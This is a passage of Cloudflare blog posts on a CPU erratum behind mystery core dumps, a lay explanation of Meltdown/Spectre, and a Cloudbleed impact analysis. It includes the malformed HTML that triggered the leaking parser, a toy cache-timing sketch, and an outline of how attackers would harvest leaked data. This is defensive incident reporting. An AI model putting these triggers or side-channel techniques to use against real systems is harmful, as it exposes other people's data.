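# "error 15" from the log line above has bits 0-3 set
print(decode_segfault_error(15))
```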
            <p>We checked these log lines against the core dumps, and they were always consistent.</p><p>The kernel has a role in controlling the processor’s <a href="https://en.wikipedia.org/wiki/Memory_management_unit">Memory Management Unit</a> to provide virtual memory to application programs. So kernel bugs in that area can lead to surprising results (and we have encountered such a bug at Cloudflare in a different context). But we examined the kernel code, and searched for reports of relevant bugs against Linux, without finding anything.</p><p>For several weeks, our efforts to find the cause were not fruitful. Due to the very low frequency of the mystery core dumps when considered on a per-server basis, we couldn’t follow the usual last-resort approach to problem solving: changing various possible causative factors in the hope that they make the problem more or less likely to occur. We needed another lead.</p>
    <div>
      <h3>The solution</h3>
      <a href="#the-solution">
        
      </a>
    </div>
    <p>But eventually, we noticed something crucial that we had missed until that point: all of the mystery core dumps came from servers containing the <a href="https://ark.intel.com/products/91767/Intel-Xeon-Processor-E5-2650-v4-30M-Cache-2_20-GHz">Intel Xeon E5-2650 v4</a>. This model belongs to the generation of Intel processors that had the codename “Broadwell”, and it’s the only model of that generation that we use in our edge servers, so we simply call these servers Broadwells. The Broadwells made up about a third of our fleet at that time, and they were in many of our datacenters. This explains why the pattern was not immediately obvious.</p><p>This insight immediately threw the focus of our investigation back onto the possibility of processor hardware issues. We downloaded <a href="https://www.intel.co.uk/content/www/uk/en/processors/xeon/xeon-e5-v4-spec-update.html">Intel’s Specification Update</a> for this model. In these Specification Update documents Intel discloses all the ways that its processors deviate from their published specifications, whether due to benign discrepancies or bugs in the hardware (Intel entertainingly calls these “errata”).</p><p>The Specification Update described 85 issues, most of which are obscure issues of interest mainly to the developers of the BIOS and operating systems. But one caught our eye: “BDF76 An Intel® Hyper-Threading Technology Enabled Processor May Exhibit Internal Parity Errors or Unpredictable System Behavior”. The symptoms described for this issue are very broad (“unpredictable system behavior may occur”), but what we were observing seemed to match the description of this issue better than any other.</p><p>Furthermore, the Specification Update stated that BDF76 was fixed in a microcode update. Microcode is firmware that controls the lowest-level operation of the processor, and can be updated by the BIOS (from the system vendor) or the OS. 
Microcode updates can change the behaviour of the processor to some extent (exactly how much is a closely-guarded secret of Intel, although <a href="https://software.intel.com/sites/default/files/managed/c5/63/336996-Speculative-Execution-Side-Channel-Mitigations.pdf">the recent microcode updates to address the Spectre vulnerability</a> give some idea of the impressive degree to which Intel can reconfigure the processor’s behaviour).</p><p>The most convenient way for us to apply the microcode update to our Broadwell servers at that time was via a BIOS update from the server vendor. But rolling out a BIOS update to so many servers in so many data centers takes some planning and time to conduct. Due to the low rate of mystery core dumps, we would not know if BDF76 was really the root cause of our problems until a significant fraction of our Broadwell servers had been updated. A couple of weeks of keen anticipation followed while we awaited the outcome.</p><p>To our great relief, once the update was completed, the mystery core dumps stopped. This chart shows the number of core dumps we were getting each day for the relevant months of 2017:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3swQhL1euB2VpWjtlom4Yh/0be3eebcb41da11502e23af45ce08eb7/coredumps.png" />
            
            </figure><p>As you can see, after the microcode update there is a marked reduction in the rate of core dumps. But we still get some core dumps. These are not mysteries, but represent conventional issues in our software. We continue to investigate and fix them to ensure they don’t represent security issues in our service.</p>
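<p>As an aside, one way to confirm that a given server has picked up a microcode update is to read the <code>microcode</code> field that Linux exposes in <code>/proc/cpuinfo</code>. A minimal sketch, parsing a sample of that file (the revision value here is illustrative, not the actual BDF76 fix):</p>

```python
# Hypothetical /proc/cpuinfo excerpt; the microcode revision below is
# illustrative, not the actual value of the BDF76 fix.
sample = """\
processor : 0
model name : Intel(R) Xeon(R) CPU E5-2650 v4 @ 2.20GHz
microcode : 0xb000021
"""

def microcode_revision(cpuinfo):
    """Extract the microcode revision from /proc/cpuinfo-style text."""
    for line in cpuinfo.splitlines():
        key, _, value = line.partition(":")
        if key.strip() == "microcode":
            return value.strip()
    return "unknown"

print(microcode_revision(sample))  # → 0xb000021
```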
    <div>
      <h3>The conclusion</h3>
      <a href="#the-conclusion">
        
      </a>
    </div>
    <p>Eliminating the mystery core dumps has made it easier to focus on any remaining crashes that are due to our code. It removes the temptation to dismiss a core dump because its cause is obscure.</p><p>And for some of the core dumps that we see now, understanding the cause can be very challenging. They correspond to very unlikely conditions, and often involve a root cause that is distant from the immediate issue that triggered the core dump. For example, we see segfaults in LuaJIT (which we embed in NGINX via OpenResty) that are not due to problems in LuaJIT, but rather because LuaJIT is particularly susceptible to damage to its data structures by bugs in unrelated C code.</p><p><i>Excited by core dump detective work? Or building systems at a scale where once-in-a-decade problems can get triggered every day? Then </i><a href="https://www.cloudflare.com/careers/"><i>join our team</i></a><i>.</i></p> ]]></content:encoded>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[NGINX]]></category>
            <guid isPermaLink="false">39XoGxaU2MKp2cinJiQEXb</guid>
            <dc:creator>David Wragg</dc:creator>
        </item>
        <item>
            <title><![CDATA[An Explanation of the Meltdown/Spectre Bugs for a Non-Technical Audience]]></title>
            <link>https://blog.cloudflare.com/meltdown-spectre-non-technical/</link>
            <pubDate>Mon, 08 Jan 2018 18:57:00 GMT</pubDate>
            <description><![CDATA[ Last week the news of two significant computer bugs was announced. They've been dubbed Meltdown and Spectre and they take advantage of very technical systems that modern CPUs have implemented to make computers extremely fast.  ]]></description>
            <content:encoded><![CDATA[ <p>Last week the news of two significant computer bugs was announced. They've been dubbed Meltdown and Spectre. These bugs take advantage of very technical systems that modern CPUs have implemented to make computers extremely fast. Even highly technical people can find it difficult to wrap their heads around how these bugs work. But, using some analogies, it's possible to understand exactly what's going on. If you've found yourself puzzled by these bugs, read on — this post is for you.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3pAwhKX7ooFUF8P1an3cKJ/c18fce014a5a239898207e23a992068b/2-paths--copy_0.5x.png" />
            
            </figure><p>“<i>When you come to a fork in the road, take it.</i>” — Yogi Berra</p><p>Late one afternoon, walking through a forest near your home and navigating with the GPS, you come to a fork in the path which you’ve taken many times before. Unfortunately, for some mysterious reason your GPS is not working, and being a methodical person you like to follow it very carefully.</p><p>Cooling your heels waiting for the GPS to start working again is annoying because you are losing time when you could be getting home. Instead of waiting, you decide to make an intelligent guess about which path is most likely based on past experience and set off down the right hand path.</p><p>After walking for a short distance the GPS comes to life and tells you which is the correct path. If you predicted correctly then you’ve saved a significant amount of time. If not, then you hop over to the other path and carry on that way.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/24R2l1SOcj5BdVPY3oiUdA/617da4c98bef86495d755ef1dbd57dca/crystal-ball_0.5x.png" />
            
            </figure><p>Something just like this happens inside the CPU in pretty much every computer. Fundamental to the very essence and operation of a computer is the ability to branch, to choose between two different code paths. As you read this, your web browser is making branch decisions continuously (for example, some part of it is waiting for you to click a link to go to some other page).</p><p>One way that CPUs have reached incredible speeds is the ability to predict which of two branches is most likely and start executing it before it knows whether that’s the correct path to take.</p><p>For example, the code that checks for you clicking <a href="https://cloudflare.com/">this link</a> might be a little slow because it’s waiting for mouse movements and button clicks. Rather than wait, the CPU will start automatically executing the branch it thinks is most likely (probably that you don’t click the link). Once the check actually indicates “clicked” or “not clicked”, the CPU will either continue down the branch it took, or abandon the code it has executed and restart at the ‘fork in the path’.</p><p>This is known as “branch prediction” and saves a great deal of idling processor time. It relies on the ability of the CPU to run code “speculatively” and throw away results if that code should not have been run in the first place.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2F3z5q7TzCLg7YUbjKSmSX/6f1334d111b32d21701e43d1e44d50ac/2-paths-_0.5x-1.png" />
            
            </figure><p>Every time you’ve taken the right hand path in the past it’s been correct, but today it isn’t. Today it’s winter and the foliage is sparser and you’ll see something you shouldn’t down that path: a secret government base hiding alien technology.</p><p>But wanting to get home fast you take the path anyway, not realizing that the GPS is going to indicate the left hand path today and keep you out of danger. Before the GPS comes back to life you catch a glimpse of an alien through the trees.</p><p>Moments later two Men In Black appear, erase your memory and dump you back at the fork in the path. Shortly after, the GPS beeps and you set off down the left hand path none the wiser.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1xVmR2maXhqCpTv1emycHQ/be79f1760eaf4742d52e679abdfa28f6/memory-erase-_0.5x-1.png" />
            
            </figure><p>Something similar to this happens in the Spectre/Meltdown attack. The CPU starts executing a branch of code that it has previously learnt is typically the right code to run. But it’s been tricked by a clever attacker and this time it’s the wrong branch. Worse, the code will access memory that it shouldn’t (perhaps from another program), giving it access to otherwise secret information (such as passwords).</p><p>When the CPU realizes it’s gone the wrong way it forgets all the erroneous work it’s done (and the fact that it accessed memory it shouldn’t have) and executes the correct branch instead. Even though illegal memory was accessed, what it contained has been forgotten by the CPU.</p><p>The core of Meltdown and Spectre is the ability to <a href="https://www.cloudflare.com/learning/security/what-is-data-exfiltration/">exfiltrate information</a>, from this speculatively executed code, concerning the illegally accessed memory through what’s known as a “side channel”.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4ZUYu6jBF8RbxSvwfqXHuv/b5b63df0d68a936d8b4efba2d3acdee2/reactor-core-_0.5x.png" />
            
            </figure><p>You’d actually heard rumours of Men In Black and want to find some way of letting yourself know whether you saw aliens or not. Since there’s a short space between you seeing aliens and your memory being erased you come up with a plan.</p><p>If you see aliens then you gulp down an energy drink that you have in your backpack. Once deposited back at the fork by the Men In Black you can discover whether you drank the energy drink (and therefore whether you saw aliens) by walking 500 metres and timing yourself. You’ll go faster with the extra carbs in a can of <i>Reactor Core</i>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2MbVsqQ9L4VhxLzTLHCp8U/b1dac5511e6b12e889872f5d59dc8946/stopwatch_0.5x.png" />
            
            </figure><p>Computers have also reached high speeds by keeping a copy of frequently or recently accessed information inside the CPU itself. The closer data is to the CPU the faster it can be used.</p><p>This store of recently/frequently used data inside the CPU is called a “cache”. Both branch prediction and the cache mean that CPUs are blazingly fast. Sadly, they can also be combined to create the security problems that have recently been reported with Intel and other CPUs.</p><p>In the Meltdown/Spectre attacks, the attacker determines what secret information (the real world equivalent of the aliens) was accessed using timing information (but not an energy drink!). In the split second after accessing illegal memory, and before the code being run is forgotten by the CPU, the attacker’s code loads a single byte into the CPU cache. A single byte which it has perfectly legal access to; something from its own program memory!</p><p>The attacker can then determine what happened in the branch just by trying to read the same byte: if it takes a long time to read then it wasn’t in cache, if it doesn’t take long then it was. The difference in timing is all the attacker needs to know what occurred in the branch the CPU should never have executed.</p><p>To turn this into an exploit that actually reads illegal memory is easy. Just repeat this process over and over again once per single bit of illegal memory that you are reading. Each single bit’s 1 or 0 can be translated into the presence or absence of an item in the CPU cache which is ‘read’ using the timing trick above.</p><p>Although that might seem like a laborious process, it is, in fact, something that can be done very quickly enabling the dumping of the entire memory of a computer. 
In the real world it would be impractical to hike down the path and get zapped by the Men In Black in order to leak details of the aliens (their color, size, language, etc.), but in a computer it’s feasible to redo the branch over and over again because of the inherent speed (100s of millions of branches per second!).</p><p>And if an attacker can dump the memory of a computer it has access to the crown jewels: what’s in memory at any moment is likely to be very, very sensitive: passwords, cryptographic secrets, the email you are writing, a private chat and more.</p>
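<p>In code terms, the attacker's final step amounts to nothing more than a threshold test on timings. This sketch (our illustration with made-up numbers, not code from the papers) classifies eight probe reads as fast (cached, so the bit was 1) or slow (uncached, so the bit was 0) and reassembles the secret byte:</p>

```python
# Toy illustration of the last step of the attack. The threshold and the
# timings are made up; a real attack calibrates these per machine.
CACHE_HIT_THRESHOLD_CYCLES = 100

def bits_from_timings(timings):
    """A fast read means the probe byte was cached, i.e. the secret bit was 1."""
    return [1 if t < CACHE_HIT_THRESHOLD_CYCLES else 0 for t in timings]

# eight probe timings in cycles, one per bit of a secret byte
timings = [62, 310, 295, 58, 301, 66, 71, 305]
bits = bits_from_timings(timings)
print(bits)                             # → [1, 0, 0, 1, 0, 1, 1, 0]
print(int("".join(map(str, bits)), 2))  # → 150
```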
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>I hope that this helps you understand the essence of Meltdown and Spectre. There are many variations of both attacks that all rely on the same ideas: get the CPU to speculatively run some code (through branch prediction or another technique) that illegally accesses memory and extract information using a timing side channel through the CPU cache.</p><p>If you care to read all the gory detail there’s a <a href="https://meltdownattack.com/meltdown.pdf">paper on Meltdown</a> and a separate one <a href="https://spectreattack.com/spectre.pdf">on Spectre</a>.</p><p>Acknowledgements: I’m grateful to all the people who read this and gave me feedback (including gently telling me the ways in which I didn’t understand branch prediction and speculative execution). Thank you especially to David Wragg, Kenton Varda, Chris Branch, Vlad Krasnov, Matthew Prince, Michelle Zatlyn and Ben Cartwright-Cox. And huge thanks to Kari Linder for the illustrations.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <guid isPermaLink="false">20Go8XADyAd2Ha0gxcfMMB</guid>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
        <item>
            <title><![CDATA[Quantifying the Impact of "Cloudbleed"]]></title>
            <link>https://blog.cloudflare.com/quantifying-the-impact-of-cloudbleed/</link>
            <pubDate>Wed, 01 Mar 2017 15:27:00 GMT</pubDate>
            <description><![CDATA[ Last Thursday we released details on a bug in Cloudflare's parser impacting our customers. It was an extremely serious bug that caused data flowing through Cloudflare's network to be leaked onto the Internet. ]]></description>
            <content:encoded><![CDATA[ <p>Last Thursday we <a href="/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/">released details</a> on a bug in Cloudflare's parser impacting our customers. It was an extremely serious bug that caused data flowing through Cloudflare's network to be leaked onto the Internet. We fully patched the bug within hours of being notified. However, given the scale of Cloudflare, the impact was potentially massive.</p><p>The bug has been dubbed “Cloudbleed.” Because of its potential impact, the bug has been written about extensively and generated a lot of uncertainty. The burden of that uncertainty has been felt by our partners, customers, and our customers’ customers. The question we’ve been asked the most often is: what risk does Cloudbleed pose to me?</p><p>We've spent the last twelve days using log data on the actual requests we’ve seen across our network to get a better grip on what the impact was and, in turn, provide an estimate of the risk to our customers. This post outlines our initial findings.</p><p>The summary is that, while the bug was very bad and had the potential to be much worse, based on our analysis so far: 1) we have found no evidence based on our logs that the bug was maliciously exploited before it was patched; 2) the vast majority of Cloudflare customers had no data leaked; 3) after a review of tens of thousands of pages of leaked data from search engine caches, we have found a large number of instances of leaked internal Cloudflare headers and customer cookies, but we have not found any instances of passwords, credit card numbers, or health records; and 4) our review is ongoing.</p><p>To make sense of the analysis, it's important to understand exactly how the bug was triggered and when data was exposed. If you feel like you've already got a good handle on how the bug got triggered, <a href="#skip">click here</a> to skip to the analysis.</p>
    <div>
      <h2>Triggering the Bug</h2>
      <a href="#triggering-the-bug">
        
      </a>
    </div>
    <p>One of Cloudflare's core applications is a stream parser. The parser scans content as it is delivered from Cloudflare's network and is able to modify it in real time. The parser is used to enable functions like automatically rewriting links from HTTP to HTTPS (Automatic HTTPS Rewrites), hiding email addresses on pages from email harvesters (Email Address Obfuscation), and other similar features.</p><p>The Cloudbleed bug was triggered when a page with two characteristics was requested through Cloudflare's network. The two characteristics were: 1) the HTML on the page needed to be broken in a specific way; and 2) a particular set of Cloudflare features needed to be turned on for the page in question.</p><p>The specific HTML flaw was that the page had to end with an unterminated attribute. In other words, something like:</p>
            <pre><code>&lt;IMG HEIGHT="50px" WIDTH="200px" SRC="</code></pre>
            <p>Here's why that mattered. When a page for a particular customer is being parsed it is stored in memory on one of the servers that is a part of our infrastructure. Contents of the other customers' requests are also in adjacent portions of memory on Cloudflare's servers.</p><p>The bug caused the parser, when it encountered an unterminated attribute at the end of a page, to not stop when it reached the end of the portion of memory for the particular page being parsed. Instead, the parser continued to read from adjacent memory, which contained data from other customers' requests. The contents of that adjacent memory were then dumped onto the page with the flawed HTML.</p>
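<p>The class of bug can be illustrated with a toy model (ours, not Cloudflare's actual parser code): a scanner that hunts for the closing quote of an attribute and stops only on the quote character will, on an unterminated attribute, keep reading into whatever happens to sit after the page in the buffer:</p>

```python
# Toy simulation (not Cloudflare's code): the page being parsed sits in a
# buffer next to other customers' data, as in the description above.
memory = '<IMG HEIGHT="50px" WIDTH="200px" SRC="' + "SECRET-COOKIE-FROM-ANOTHER-CUSTOMER"
page_end = 38  # length of the page itself; everything after is "adjacent memory"

def attr_value_buggy(buf, start):
    """Stops only on a closing quote, so it reads past page_end when unterminated."""
    i = start
    while i < len(buf) and buf[i] != '"':
        i += 1
    return buf[start:i]

def attr_value_safe(buf, start, end):
    """Also stops at the end of the page."""
    i = start
    while i < end and buf[i] != '"':
        i += 1
    return buf[start:i] if i < end else None  # None: attribute never terminated

open_quote = memory.index('SRC="') + 5
print(attr_value_buggy(memory, open_quote))           # leaks the adjacent data
print(attr_value_safe(memory, open_quote, page_end))  # → None
```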
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1yvI4wl7lorT0A9EMcML1J/d568d31dd873504853c484f1aacf269e/example-leak.png" />
            
            </figure><p>The screenshot above is an example of how data was dumped on pages. Most of the data was random binary data, which the browser tried to interpret as text, rendering largely as Asian characters. That is followed by a number of internal Cloudflare headers.</p><p>If you had accessed one of the pages that triggered the bug you would have seen what likely looked like random text at the end of the page. The amount of data dumped varied randomly, limited by the size of the heap or cut short when the parser happened across a character that caused the output to terminate.</p>
    <div>
      <h2>Code Path and a New Parser</h2>
      <a href="#code-path-and-a-new-parser">
        
      </a>
    </div>
    <p>In addition to a page with flawed HTML, the particular set of Cloudflare features that were enabled mattered because it determined the version of the parser that was used. We rolled out a new version of the parser code on 22 September 2016. This new version of the parser exposed the bug.</p><p>Initially, the new parser code would only get executed under a very limited set of circumstances. Fewer than 180 sites from 22 September 2016 through 13 February 2017 had the combination of the HTML flaw and the set of features that would trigger the new version of the parser. During that time period, pages that had both characteristics and therefore would trigger the bug were accessed an estimated 605,037 times.</p><p>On 13 February 2017, not aware of the bug, we expanded the circumstances under which the new parser would get executed. That expanded the number of sites where the bug could get triggered from fewer than 180 to 6,457. From 13 February 2017 through 18 February 2017, when we patched the bug, the pages that would trigger the bug were accessed an estimated 637,034 times. In total, between 22 September 2016 and 18 February 2017 we now estimate based on our logs the bug was triggered 1,242,071 times.</p><p>The pages that typically triggered the bug tended to be on small and infrequently accessed sites. When one of these vulnerable pages was accessed and the bug was triggered, it was random which other customers would have content in adjacent memory that would then get leaked. Higher traffic Cloudflare customers were more likely to have some data in memory because they received more requests and so, probabilistically, their content was more likely to be in memory at any given time.</p><p>To be clear, customers that had data leak did not need to have flawed HTML or any particular Cloudflare features enabled. They just needed to be unlucky and have their data in memory immediately following a page that triggered the bug.</p>
    <div>
      <h2>How a Malicious Actor Would Exploit the Bug</h2>
      <a href="#how-a-malicious-actor-would-exploit-the-bug">
        
      </a>
    </div>
    <p>The Cloudbleed bug wasn't like a typical data breach. To analogize to the physical world, a typical data breach would be like a robber breaking into your office and stealing all your file cabinets. The bad news in that case is that the robber has all your files. The good news is you know exactly what they have.</p><p>Cloudbleed is different. It's more akin to learning that a stranger may have listened in on two employees at your company talking over lunch. The good news is the amount of information for any conversation that's eavesdropped is limited. The bad news is you can't know exactly what the stranger may have heard, including potentially sensitive information about your company.</p><p>If a stranger were listening in on a conversation between two employees, the vast majority of what they would hear wouldn't be harmful. But, every once in a while, the stranger may overhear something confidential. The same is true if a malicious attacker knew about the bug and were trying to exploit it. Given that the data that leaked was random on a per request basis, most requests would return nothing interesting. But, every once in a while, the data that leaked may return something of interest to a hacker.</p><p>If a hacker were aware of the bug before it was patched and trying to exploit it then the best way for them to do so would be to send as many requests as possible to a page that contained the set of conditions that would trigger the bug. They could then record the results. Most of what they would get would be useless, but some would contain very sensitive information.</p><p>The nightmare scenario we have been worried about is if a hacker had been aware of the bug and had been quietly mining data before we were notified by Google's Project Zero team and were able to patch it. For the last twelve days we've been reviewing our logs to see if there's any evidence to indicate that a hacker was exploiting the bug before it was patched. 
We’ve found nothing so far to indicate that was the case.</p>
    <div>
      <h2>Identifying Patterns of Malicious Behavior</h2>
      <a href="#identifying-patterns-of-malicious-behavior">
        
      </a>
    </div>
    <p>For a limited period of time we keep a debugging log of requests that pass through Cloudflare. This is done by sampling 1% of requests and storing information about the request and response. We are then able to look back in time for anomalies in HTTP response codes, response or request body sizes, response times, or other unusual behavior from specific networks or IP addresses.</p><p>We have the logs of 1% of all requests going through Cloudflare from 8 February 2017 up to 18 February 2017 (when the vulnerability was patched) giving us the ability to look for requests leaking data during this time period. Requests prior to 8 February 2017 had already been deleted. Because we have a representative sample of the logs for the 6,457 vulnerable sites, we were able to parse them in order to look for any evidence someone was exploiting the bug.</p><p>The first thing we looked for was a site we knew was vulnerable and for which we had accurate data. In the early hours of 18 February 2017, immediately after the problem was reported to us, we set up a vulnerable page on a test site and used it to reproduce the bug and then verify it had been fixed.</p><p>Because we had logging on the test web server itself we were able to quickly verify that we had the right data. The test web server had received 31,874 hits on the vulnerable page due to our testing. We had captured very close to 1% of those requests (316 were stored). From the sampled data, we were also able to look at the sizes of responses which showed a clear bimodal distribution. Small responses were from when the bug was fixed, large responses from when the leak was apparent.</p><p>This gave us confidence that we had captured the right information to go hunting for exploitation of the vulnerability.</p><p>We wanted to answer two questions:</p><ol><li><p>Did any individual IP hit a vulnerable page enough times that a meaningful amount of data was extracted? 
This would capture the situation where someone had discovered the problem on a web page and had set up a process to repeatedly download the page from their machine. For example, something as simple as running <code>curl</code> in a loop would show up in this analysis.</p></li><li><p>Was any vulnerable page accessed enough times that a meaningful amount of data could have been extracted by a botnet? A more advanced hacker would have wanted to cover their footprints by using a wide range of IP addresses rather than repeatedly visiting a page from a single IP. To identify that possibility we wanted to see if any individual page had been accessed enough times and returned enough data for us to suspect that data was being extracted.</p></li></ol>
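<p>Question #1 reduces to a counting problem over the sampled logs: with a 1-in-100 sample, an IP that hit a page around 1,000 times should appear around 10 times in the sample. A toy sketch of that check (our names and thresholds, not Cloudflare's actual tooling):</p>

```python
from collections import Counter

# Toy sketch (illustrative, not Cloudflare's tooling): scale sampled counts
# back up and keep (ip, url) pairs whose estimated hit count crosses a threshold.
def heavy_hitters(sampled_requests, sample_divisor=100, threshold_hits=1_000):
    """sampled_requests: iterable of (client_ip, url) pairs from the sample."""
    counts = Counter(sampled_requests)
    return {pair: n * sample_divisor
            for pair, n in counts.items()
            if n * sample_divisor >= threshold_hits}

sample = ([("203.0.113.7", "/broken.html")] * 12
          + [("198.51.100.2", "/index.html")] * 3)
print(heavy_hitters(sample))  # → {('203.0.113.7', '/broken.html'): 1200}
```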
    <div>
      <h2>Reviewing the Logs</h2>
      <a href="#reviewing-the-logs">
        
      </a>
    </div>
    <p>To answer #1, we looked for any IP addresses that had hit a single page on a vulnerable site more than 1,000 times and downloaded more data than the site would normally deliver. We found 7 IP addresses with those characteristics.</p><p>Six of the seven IP addresses were accessing three sites with three pages with very large HTML. Manual inspection showed that these pages did not contain the broken HTML that would have triggered the bug. They also did not appear in a database of potentially vulnerable pages that our team gathered after the bug was patched.</p><p>The other IP address belonged to a mobile network and was traffic for a ticket booking application. The particular page was very large even though it was not leaking data, however, it did not contain broken HTML, and was not in our database of vulnerable pages.</p><p>To look for evidence of #2, we retrieved every page on a vulnerable site that was requested more than 1,000 times during the period. We then downloaded those pages and ran them through the vulnerable version of our software in a test environment to see if any of them would cause a leak. This search turned up the sites we had created to test the vulnerability. However, we found no vulnerable pages, outside of our own test sites, that had been accessed more than 1,000 times.</p><p>This leads us to believe that the vulnerability had not been exploited between 8 February 2017 and 18 February 2017. However, we also wanted to look for signs of exploitation between 22 September 2016 and 8 February 2017 — a time period for which we did not have sampled log data. To do that, we turned to our customer analytics database.</p>
    <div>
      <h2>Reviewing Customer Analytics</h2>
      <a href="#reviewing-customer-analytics">
        
      </a>
    </div>
<p>We store customer analytics data with one hour granularity in a large datastore. For every site on Cloudflare and for each hour we have the total number of requests to the site, number of bytes read from the origin web server, number of bytes sent to client web browsers, and the number of unique IP addresses accessing the site.</p><p>If a malicious attacker were sending a large number of requests to exploit the bug then we hypothesized that a number of signals would potentially appear in our logs. These include:</p><ul><li><p>The ratio of requests per unique IP would increase. While an attacker could use a botnet or large number of machines to harvest data, we speculated that, at least initially, upon discovering the bug the hacker would send a large number of requests from a small set of IPs to gather initial data.</p></li><li><p>The ratio of bandwidth per request would increase. Since the bug leaks a large amount of data onto the page, if the bug were being exploited then the bandwidth per request would increase.</p></li><li><p>The ratio of bandwidth per unique IP would also increase. Since more data would be going to the smaller set of IPs the attacker used to pull down data, the bandwidth per IP would increase.</p></li></ul><p>We used the data from before the bug impacted sites to set the baseline for each site for each of these three ratios. We then tracked the ratios above across each site individually during the period for which it was vulnerable and looked for anomalies that may suggest a hacker was exploiting the vulnerability ahead of its public disclosure.</p><p>This data is much noisier than the sampled log data because it is rolled up and averaged over one hour windows. However, we have not seen any evidence of exploitation of this bug from this data.</p>
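<p>The baseline comparison described above can be sketched in a few lines of C. This is our own illustration of the heuristic; the struct, the field names, and the threshold are hypothetical, not Cloudflare’s analytics pipeline:</p>

```c
/* One hour of per-site rollup data, as described above.
 * Illustrative struct; field names are ours, not Cloudflare's. */
typedef struct {
    double requests;    /* total requests to the site       */
    double bytes_sent;  /* bytes sent to client browsers    */
    double unique_ips;  /* unique client IPs seen that hour */
} hour_t;

/* Flag an hour whose ratios exceed the site's pre-bug baseline by
 * more than `factor` (the threshold is for illustration only). */
static int anomalous(const hour_t *base, const hour_t *h, double factor)
{
    double req_per_ip = base->requests   / base->unique_ips;
    double bw_per_req = base->bytes_sent / base->requests;
    double bw_per_ip  = base->bytes_sent / base->unique_ips;

    return h->requests   / h->unique_ips > factor * req_per_ip
        || h->bytes_sent / h->requests   > factor * bw_per_req
        || h->bytes_sent / h->unique_ips > factor * bw_per_ip;
}
```

<p>An hour that simply scales traffic up keeps all three ratios flat and is not flagged; a burst of large responses to a small set of IPs trips one or more of the ratio checks.</p>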
    <div>
      <h2>Reviewing Crash Data</h2>
      <a href="#reviewing-crash-data">
        
      </a>
    </div>
<p>Lastly, when the bug was triggered it would, depending on what was read from memory, sometimes cause our parser application to crash. We have technical operations logs that record every time an application running on our network crashes. These logs cover the entire period of time the bug was in production (22 September 2016 – 18 February 2017).</p><p>We ran a suite of known-vulnerable HTML through our test platform to establish the percentage of time that we would expect the application to crash.</p><p>We reviewed our application crash logs for the entire period the bug was in production. We did turn up periodic instances of the parser crashing at a rate consistent with how often we estimate the bug was triggered. However, we did not see a signal in the crash data that would indicate that the bug was being actively exploited at any point during the period it was present in our system.</p>
    <div>
      <h2>Purging Search Engine Caches</h2>
      <a href="#purging-search-engine-caches">
        
      </a>
    </div>
    <p>Even if an attacker wasn’t actively exploiting the bug prior to our patching it, there was still potential harm because private data leaked and was cached by various automated crawlers. Because the 6,457 sites that could trigger the bug were generally small, the largest percentage of their traffic comes from search engine crawlers. Of the 1,242,071 requests that triggered the bug, we estimate more than half came from search engine crawlers.</p><p>Cloudflare has spent the last 12 days working with various search engines — including Google, Bing, Yahoo, Baidu, Yandex, DuckDuckGo, and others — to clear their caches. We were able to remove the majority of the cached pages before the disclosure of the bug last Thursday.</p><p>Since then, we’ve worked with major search engines as well as other online archives to purge cached data. We’ve successfully removed more than 80,000 unique cached pages. That underestimates the total number because we’ve requested search engines purge and recrawl entire sites in some instances. Cloudflare customers who discover leaked data still online can report it by sending a link to the cache to <a href="#">parserbug@cloudflare.com</a> and our team will work to have it purged.</p>
    <div>
      <h2>Analysis of What Data Leaked</h2>
      <a href="#analysis-of-what-data-leaked">
        
      </a>
    </div>
    <p>The search engine caches provide us an opportunity to analyze what data leaked. While many have speculated that any data passing through Cloudflare may have been exposed, the way that data is structured in memory and the frequency of GET versus POST requests makes certain data more or less likely to be exposed. We analyzed a representative sample of the cached pages retrieved from search engine caches and ran a thorough analysis on each of them. The sample included thousands of pages and was statistically significant to a confidence level of 99% with a margin of error of 2.5%. Within that sample we would expect the following data types to appear this many times in any given leak:</p>
            <pre><code>  67.54 Internal Cloudflare Headers
   0.44 Cookies
   0.04 Authorization Headers / Tokens
      0 Passwords
      0 Credit Cards / Bitcoin Addresses
      0 Health Records
      0 Social Security Numbers
      0 Customer Encryption Keys</code></pre>
            <p>The above can be read to mean that in any given leak you would expect to find 67.54 Cloudflare internal headers. You’d expect to find a cookie in approximately half of all leaks (0.44 cookies per leak). We did not find any passwords, credit cards, health records, social security numbers, or customer encryption keys in the sample set.</p><p>Since this is just a sample, it is <i>not correct</i> to conclude that no passwords, credit cards, health records, social security numbers, or customer encryption keys were ever exposed. However, if there was any exposure, based on the data we’ve reviewed, it does not appear to have been widespread. We have also not had any confirmed reports of third parties discovering any of these sensitive data types on any cached pages.</p><p>These findings generally make sense given what we know about traffic to Cloudflare sites. Based on our logs, the ratio of GET to POST requests across our network is approximately 100-to-1. Since POSTs are more likely to contain sensitive data like passwords, we estimate that reduces the potential exposure of the most sensitive data from 1,242,071 requests to closer to 12,420. POSTs that contain particularly sensitive information would then represent only a fraction of the 12,420 we would expect to have leaked.</p><p>This is not to downplay the seriousness of the bug. For instance, depending on how a Cloudflare customer’s systems are implemented, cookie data, which would be present in GET requests, could be used to impersonate another user’s session. We’ve seen approximately 150 Cloudflare customers’ data in the more than 80,000 cached pages we’ve purged from search engine caches. When data for a customer is present, we’ve reached out to the customer proactively to share the data that we’ve discovered and help them work to mitigate any impact. 
Generally, if customer data was exposed, invalidating session cookies and rolling any internal authorization tokens is the best advice to mitigate the largest potential risk based on our investigation so far.</p>
    <div>
      <h2>How to Understand Your Risk</h2>
